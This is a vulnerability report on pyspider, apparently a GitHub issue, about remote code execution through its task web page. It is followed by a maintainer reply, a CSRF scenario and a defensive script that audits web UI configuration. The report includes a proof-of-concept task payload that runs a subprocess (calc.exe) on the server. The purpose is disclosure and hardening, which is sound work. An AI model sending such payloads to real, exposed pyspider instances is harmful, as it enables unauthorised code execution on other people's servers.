pyspider
Script content needs security check which could cause RCE
🐛 Bug Report
Script content needs security check which could cause RCE
To Reproduce
- start up a pyspider-server.
- access the task webpage.
- upload a task with malicious script.
- bingo!
Expected behavior
The server will execute the code that you set (it runs a calc.exe that I set to prove this vuln).
Test script or set of commands reproducing this issue
Post this task as follows to the server.
data = {
    'webdav_mode': 'false',
    'script': '''from pyspider.libs.base_handler import *
import socket
import os
import sys
import time
import subprocess
def test():
    try:
        p=subprocess.call(["calc.exe",])
    except:
        pass
####
class Handler(BaseHandler):
    def on_start(self):
        test()
''',
    'task':'''{
  "process": {
    "callback": "on_start"
  },
  "project": "pyspider_test",
  "taskid": "data:,on_start",
  "url": "data:,on_start"
}
'''
}
Environment
pyspider v0.3.10; system: Ubuntu 18.04 & Windows 10 version 1909
Yes, script running is fundamental to this project. There's a warning in the README that you can set up auth for the task page.
Yeah, most people still start pyspider with the default configuration. Could you force the modification of this default setting? Meanwhile, we also designed such a scenario, in which it is opened with only localhost allowed to access it, while supporting JavaScript (using other components for rendering). We use the CSRF method to request the local pyspider to achieve the same effect.
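A deployment check for the two points raised in this thread (auth on the web UI, and localhost-only binding not being sufficient), as an added example that is not part of the issue or of pyspider's code. It assumes the `webui` section of a pyspider JSON config uses the keys `username`, `password`, `need-auth` and `host`, with `host` defaulting to `0.0.0.0`; verify those names against the version you run. The sample configs are constructed.

```python
LOOPBACK = {"127.0.0.1", "::1", "localhost"}

def audit_webui(config):
    """Return (code, message) findings for the "webui" section of a config dict.

    Key names and the 0.0.0.0 default are assumptions taken from pyspider's
    documented config layout, not read from the installed package.
    """
    webui = config.get("webui") or {}
    findings = []
    need_auth = bool(webui.get("need-auth", False))
    has_creds = bool(webui.get("username")) and bool(webui.get("password"))
    host = webui.get("host", "0.0.0.0")

    if not need_auth:
        findings.append(("NO_AUTH",
            "need-auth is off: anyone who can reach the web UI can save and run scripts"))
    if not has_creds:
        findings.append(("NO_CREDS",
            "username/password missing: need-auth has nothing to check against"))
    if host not in LOOPBACK:
        findings.append(("EXPOSED_BIND",
            "web UI binds to %s: restrict with a firewall or bind to loopback" % host))
    elif not need_auth:
        # The thread's second scenario: a loopback-only UI is still reachable
        # by requests that a browser on the same machine is made to send.
        findings.append(("CSRF_LOCAL",
            "loopback bind without auth does not stop cross-site requests from a local browser"))
    return findings

# Constructed sample configs, not taken from a real deployment.
DEFAULT_START = {}                                  # started with no config file
LOCAL_ONLY = {"webui": {"host": "127.0.0.1"}}       # localhost only, no auth
HARDENED = {"webui": {"host": "127.0.0.1", "need-auth": True,
                      "username": "crawler-admin",
                      "password": "PLACEHOLDER-long-random-secret"}}

if __name__ == "__main__":
    for name, cfg in [("default", DEFAULT_START), ("local-only", LOCAL_ONLY),
                      ("hardened", HARDENED)]:
        print(name)
        for code, msg in audit_webui(cfg) or [("OK", "no findings")]:
            print("  [%s] %s" % (code, msg))
```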